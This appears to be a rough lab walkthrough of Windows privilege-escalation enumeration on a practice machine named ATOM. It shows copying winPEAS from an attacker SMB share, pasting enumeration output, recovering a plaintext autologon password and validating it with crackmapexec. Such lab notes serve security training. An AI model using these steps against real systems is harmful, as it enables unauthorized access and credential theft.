PEAS
ps c:\> mkdir tmp ; cd tmp ; copy \\10.10.14.23\smb\winPEASx64.exe .Delivery complete over SMB
Executing PEAS
Updates
���������� Showing All Microsoft Updates
HotFix ID : KB4601554
Installed At (UTC) : 4/5/2021 11:33:15 AM
Title : 2021-02 Cumulative Update Preview for .NET Framework 3.5 and 4.8 for Windows 10, version 20H2 for x64 (KB4601554)
Client Application ID : MoUpdateOrchestrator
Description : Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
=================================================================================================
HotFix ID : KB4589212
Installed At (UTC) : 4/5/2021 11:31:44 AM
Title : 2021-01 Update for Windows 10 Version 20H2 for x64-based Systems (KB4589212)
Client Application ID : MoUpdateOrchestrator
Description : Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
===============================================================
HotFix ID : KB4577586
Installed At (UTC) : 4/5/2021 11:31:35 AM
Title : Update for Removal of Adobe Flash Player for Windows 10 Version 20H2 for x64-based systems (KB4577586)
Client Application ID : MoUpdateOrchestrator
Description : This update will remove Adobe Flash Player from your Windows machine. After you install this item, you may have to restart your computer.
=================================================================================================
HotFix ID : KB5000842
Installed At (UTC) : 4/5/2021 10:52:37 AM
Title : 2021-03 Cumulative Update Preview for Windows 10 Version 20H2 for x64-based Systems (KB5000842)
Client Application ID : MoUpdateOrchestrator
Description : Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
=================================================================================================
HotFix ID : KB5000802
Installed At (UTC) : 4/3/2021 9:52:24 AM
Title : 2021-03 Cumulative Update for Windows 10 Version 20H2 for x64-based Systems (KB5000802)
Client Application ID : MoUpdateOrchestrator
Description : Install this update to resolve issues in Windows. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article for more information. After you install this item, you may have to restart your computer.
=================================================================================================
: KB4023057
Installed At (UTC) : 4/3/2021 9:38:34 AM
Title : 2021-01 Update for Windows 10 Version 20H2 for x64-based Systems (KB4023057)
Client Application ID : MoUpdateOrchestrator
Description : A security issue has been identified in a Microsoft software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
=================================================================================================
HotFix ID : KB4601050
Installed At (UTC) : 4/3/2021 9:38:33 AM
Title : 2021-02 Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10, version 20H2 for x64 (KB4601050)
Client Application ID : MoUpdateOrchestrator
Description : A security issue has been identified in a Microsoft software product that could affect your system. You can help protect your system by installing this update from Microsoft. For a complete listing of the issues that are included in this update, see the associated Microsoft Knowledge Base article. After you install this update, you may have to restart your system.
=================================================================================================
HotFix ID : KB2267602
Installed At (UTC) : 4/1/2021 8:18:26 PM
Title : Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.333.1767.0)
Client Application ID : MoUpdateOrchestrator
Description : Install this update to revise the files that are used to detect viruses, spyware, and other potentially unwanted software. Once you have inst, it cannot be removed.
=================================================================================================
HotFix ID : KB4052623
Installed At (UTC) : 4/1/2021 8:17:33 PM
Title : Update for Microsoft Defender Antivirus antimalware platform - KB4052623 (Version 4.18.2102.4)
Client Application ID : MoUpdateOrchestrator
Description : This package will update Microsoft Defender Antivirus antimalware platform's components on the user machine.
=================================================================================================
HotFix ID : KB2267602
Installed At (UTC) : 4/1/2021 6:12:43 PM
Title : Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.333.1761.0)
Client Application ID : Microsoft Defender Antivirus (77BDAF73-B396-481F-9042-AD358843EC24)
Description : Install this update to revise the files that are used to detect viruses, spyware, and other potentially unwanted software. Once you have installed this item, it cannot be removed.
=================================================================================================ENV
���������� User Environment Variables
� Check for some passwords or keys in the env variables
computername: ATOM
psexecutionpolicypreference: Bypass
homepath: \Users\jason
localappdata: C:\Users\jason\AppData\Local
psmodulepath: C:\Users\jason\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\
processor_architecture: AMD64
path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files\nodejs\;C:\WINDOWS\System32\OpenSSH\;C:\Users\jason\AppData\Roaming\npm;%USERPROFILE%\AppData\Local\Microsoft\WindowsApps
commonprogramfiles(x86): C:\Program Files (x86)\Common Files
programfiles(x86): C:\Program Files (x86)
processor_level: 23
logonserver: \\ATOM
pathext: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
homedrive: C:
systemroot: C:\WINDOWS
allusersprofile: C:\ProgramData
driverdata: C:\Windows\System32\Drivers\DriverData
userprofile: C:\Users\jason
appdata: C:\Users\jason\AppData\Roaming
processor_revision: 3100
username: jason
commonprogramw6432: C:\Program Files\Common Files
onedrive: C:\Users\jason\OneDrive
commonprogramfiles: C:\Program Files\Common Files
os: Windows_NT
userdomain_roamingprofile: ATOM
processor_identifier: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
comspec: C:\WINDOWS\system32\cmd.exe
prompt: $P$G
systemdrive: C:
temp: C:\Users\jason\AppData\Local\Temp
programfiles: C:\Program Files
tmp: C:\Users\jason\AppData\Local\Temp
programdata: C:\ProgramData
programw6432: C:\Program Files
windir: C:\WINDOWS
userdomain: ATOM
public: C:\Users\Public
���������� System Environment Variables
� Check for some passwords or keys in the env variables
comspec: C:\WINDOWS\system32\cmd.exe
driverdata: C:\Windows\System32\Drivers\DriverData
os: Windows_NT
pathext: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
processor_architecture: AMD64
temp: C:\WINDOWS\TEMP
tmp: C:\WINDOWS\TEMP
username: SYSTEM
windir: C:\WINDOWS
number_of_processors: 2
processor_level: 23
processor_identifier: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
processor_revision: 3100
path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files\nodejs\;C:\WINDOWS\System32\OpenSSH\
psmodulepath: C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\LAPS
LSA Protection
Credentials Guard
Cached Creds
AV
UAC
PowerShell
NTLM
GP
Printers
���������� Enumerating Printers (WMI)
name: Microsoft XPS Document Writer
status: Unknown
sddl: O:SYD:(A;;SWRC;;;S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422)(A;OIIO;RPWPSDRCWDWO;;;S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422)(A;;LCSWSDRCWDWO;;;S-1-5-21-1199094703-3580107816-3092147818-1001)(A;OIIO;RPWPSDRCWDWO;;;S-1-5-21-1199094703-3580107816-3092147818-1001)(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
is default: False
is network printer: False
=================================================================================================
name: Microsoft Print to PDF
status: Unknown
sddl: O:SYD:(A;;SWRC;;;S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422)(A;OIIO;RPWPSDRCWDWO;;;S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422)(A;;LCSWSDRCWDWO;;;S-1-5-21-1199094703-3580107816-3092147818-1001)(A;OIIO;RCWDWO;;;BA)(A;OICIIO;GA;;;BA)4703-3580107816-3092147818-1001)(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDR
is default: True
is network printer: False
=================================================================================================
name: Fax
status: Unknown
sddl: O:SYD:(A;;SWRC;;;S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422)(A;OIIO;RPWPSDRCWDWO;;;S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422)(A;;LCSWSDRCWDWO;;;S-1-5-21-1199094703-3580107816-3092147818-1001)(A;OIIO;RPWPSDRCWDWO;;;S-1-5-21-1199094703-3580107816-3092147818-1001)(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
is default: False
is network printer: False.NET Version
Token Privileges
Logged Users
RDP?
HOMEDIR
AutoLogon
ps c:\WINDOWS\system32> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
userinit reg_sz c:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
LastLogOffEndTimePerfCounter REG_QWORD 0x2e449c8b1
ShutdownFlags REG_DWORD 0x8000022b
AutoAdminLogon REG_SZ 1
DefaultDomainName REG_SZ ATOM
DefaultUserName REG_SZ jason
IsConnectedAutoLogon REG_DWORD 0x0
DisableCad REG_DWORD 0x1
DisableLockWorkstation REG_DWORD 0x0
EnableFirstLogonAnimation REG_DWORD 0x1
AutoLogonSID REG_SZ S-1-5-21-1199094703-3580107816-3092147818-1002
LastUsedUsername REG_SZ jason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKeyModifiable Services
Installed Programs
Scheduled Tasks
SMB
UDP
Credential Manager
jason:kidvscat_electron_@123
ps c:\> cmdkey /list
currently stored credentials:
target: WindowsLive:target=virtualapp/didlogical
type: Generic
user: 02qqfqypcqyxtlej
Local machine persistence
target: LegacyGeneric:target=ATOM\jason
type: Generic
user: ATOM\jasonValidation
└─$ crackmapexec smb $IP -u 'jason' -p 'kidvscat_electron_@123' --shares
SMB 10.10.10.237 445 ATOM [*] Windows 10 Pro 19042 x64 (name:ATOM) (domain:ATOM) (signing:False) (SMBv1:True)
SMB 10.10.10.237 445 ATOM [+] ATOM\jason:kidvscat_electron_@123
SMB 10.10.10.237 445 ATOM [+] Enumerated shares
SMB 10.10.10.237 445 ATOM Share Permissions Remark
SMB 10.10.10.237 445 ATOM ----- ----------- ------
SMB 10.10.10.237 445 ATOM ADMIN$ Remote Admin
SMB 10.10.10.237 445 ATOM C$ Default share
SMB 10.10.10.237 445 ATOM IPC$ Remote IPC
SMB 10.10.10.237 445 ATOM Software_Updates READ,WRITE Validated
Recent cmd
DPAPI
